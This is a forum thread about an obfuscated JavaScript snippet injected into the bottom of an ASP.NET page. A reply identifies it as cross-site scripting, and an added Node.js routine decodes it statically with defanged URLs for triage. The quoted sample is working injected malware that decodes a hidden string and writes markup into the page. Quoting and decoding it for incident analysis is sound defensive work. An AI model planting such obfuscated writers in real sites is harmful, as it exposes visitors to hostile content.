Today I found that my site was down. I turned the errors off and tracked the error.
It turned out that there was some code added to the bottom of my aspx page (please find the code below). Obviously, since the code had some HTML tag which my aspx page did not allow, it resulted in an error.
I do not know what scenarios I should check that could have a loophole allowing someone to insert code into my aspx page.
<html>
<body>
<script>
var a='';
var b='%2/tafod%h2b233 Cstx-ri2%%32d%i e%/i.nci5g%e%%% 30hisen%h2%%r0/ irt-cis232D0e2f %22mcmimt2t2o2CEr%%nrae2%h2r%%a mDAlmu.w2i5mDEe fcpahch%D0%fr2r a33aond02e2a33m ';
var c='5314869720';
for(var i=0;i<16;i++) for(var j=0;j<10;j++) a+=b.charAt((parseInt(c.charAt(j))*16)+i);
document.writeln(unescape(a));
</script>
</body>
</html>
It looks like cross-site scripting (XSS) to me. It’s the #2 most common attack out there, right after SQL Injection.
No offense meant, I don’t know your experience/background, but if you’re not aware of XSS, and you’re a web developer, I strongly suggest reading up. OWASP is a great resource.
XSS not only affects people going to your website, but thanks to CSRF (Cross-Site Request Forgery), XSS can be leveraged to attack other websites that your viewers are logged into, so it affects not just you and your website, but others as well.
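Added example (not part of the original thread): a static decode of the script posted in the question, meant to be run under Node.js so that nothing is rendered or fetched. `ENCODED` and `ORDER` are the sample's `b` and `c`; the function names are made up for this example.

```javascript
// Static triage of the injected script: decode it as data, never render it.
// ENCODED and ORDER are copied from variables b and c in the posted sample.
const ENCODED = '%2/tafod%h2b233 Cstx-ri2%%32d%i e%/i.nci5g%e%%% 30hisen%h2%%r0/ irt-cis232D0e2f %22mcmimt2t2o2CEr%%nrae2%h2r%%a mDAlmu.w2i5mDEe fcpahch%D0%fr2r a33aond02e2a33m ';
const ORDER = '5314869720';

// Undo the transposition exactly as the sample's nested loop does: the string
// is ORDER.length blocks of `rows` characters; output row i takes character i
// of each block, visiting the blocks in the sequence given by ORDER.
function untranspose(encoded, order) {
  const rows = encoded.length / order.length;
  if (!Number.isInteger(rows)) throw new Error('length is not a multiple of the key length');
  let out = '';
  for (let i = 0; i < rows; i++) {
    for (const digit of order) out += encoded.charAt(Number(digit) * rows + i);
  }
  return out;
}

// The sample passes the result to unescape() and document.writeln(); here the
// percent-decoded markup is only returned as a string for inspection.
function decodeInjected(encoded, order) {
  return unescape(untranspose(encoded, order)).trim();
}

// Defang URLs so the report can be pasted into tickets without live links.
const defang = (s) => s.replace(/^http/i, 'hxxp').replace(/\./g, '[.]');

// Summarise the markup with regexes (no HTML parser, no DOM): which tags it
// opens and which attributes it sets.
function summarise(markup) {
  const tags = [...markup.matchAll(/<([a-z][a-z0-9]*)/gi)].map((m) => m[1].toLowerCase());
  const attrs = {};
  for (const m of markup.matchAll(/([a-z-]+)="([^"]*)"/gi)) {
    attrs[m[1].toLowerCase()] = defang(m[2]);
  }
  return { tags, attrs };
}

const decoded = decodeInjected(ENCODED, ORDER);
const report = summarise(decoded);
console.log('tags written into the page:', report.tags);
console.log('attributes (URLs defanged):', report.attrs);
```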